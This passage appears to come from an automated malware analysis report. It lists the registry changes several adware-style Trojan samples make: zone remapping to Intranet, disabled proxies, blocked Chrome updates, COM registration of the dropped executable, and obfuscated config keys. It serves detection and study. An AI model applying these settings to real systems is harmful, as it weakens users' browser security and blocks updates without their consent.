"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 45 4D 19 EE 1D E8 01 14 18 04 96 41 37 81 7C"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"InstallDate" = "20140701"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"CategoryName" = "Apps"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"SilentUninstall" = "%Program Files%\bestadblocker\tEp7pMPAVoxXWr.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:592 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"CategoryName" = "Apps"
"NoRepair" = "1"
"ProductName" = "CutThePrIcE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"NoModify" = "1"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"UninstallString" = "%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.exe /s /n /i:ExecuteCommands;UninstallCommands"
"InstallDate" = "20140701"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"SilentUninstall" = "%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayIcon" = "%System%\msiexec.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayName" = "CutThePrIcE"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 C0 A7 2F 84 63 D6 00 93 4F 6E 60 95 C8 6E CE"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1936 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"CategoryName" = "Apps"
"NoRepair" = "1"
"ProductName" = "CutaThePrice"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"NoModify" = "1"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"UninstallString" = "%Program Files%\CutaThePrice\CutaThePrice.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

"UpdateDefault" = "0"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"SilentUninstall" = "%Program Files%\CutaThePrice\CutaThePrice.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayIcon" = "%System%\msiexec.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayName" = "CutaThePrice"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 03 1F 34 56 16 EB 31 95 6F 64 32 0F 76 D4 A4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"InstallDate" = "20140701"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:440 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

"AutoUpdateCheckPeriodMinutes" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"SilentUninstall" = "%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoRepair" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"UninstallString" = "%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe /s /n /i:ExecuteCommands;UninstallCommands"
"DisplayIcon" = "%System%\msiexec.exe"
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 B5 29 E0 BD 96 28 92 29 8E B0 C9 E8 09 C8 F5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"CategoryName" = "Apps"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"InstallDate" = "20140701"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"ProductName" = "Web Protector Reliable Phishing Protection"
"DisplayName" = "Web Protector Reliable Phishing Protection"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process NybbleCrawler.xyz.exe:356 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c5705860" = "Vx////%%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c99a5f5c" = "///%"
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a1dcff5b" = "V/////%%"
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"CategoryName" = "NybbleCrawler"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"3c09c42b" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"dbaf3ce3" = "/P////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"iiid" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"dbaf3ce3" = "/P////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"370856c7" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"0c230bcb" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"0c230bcb" = "///%"

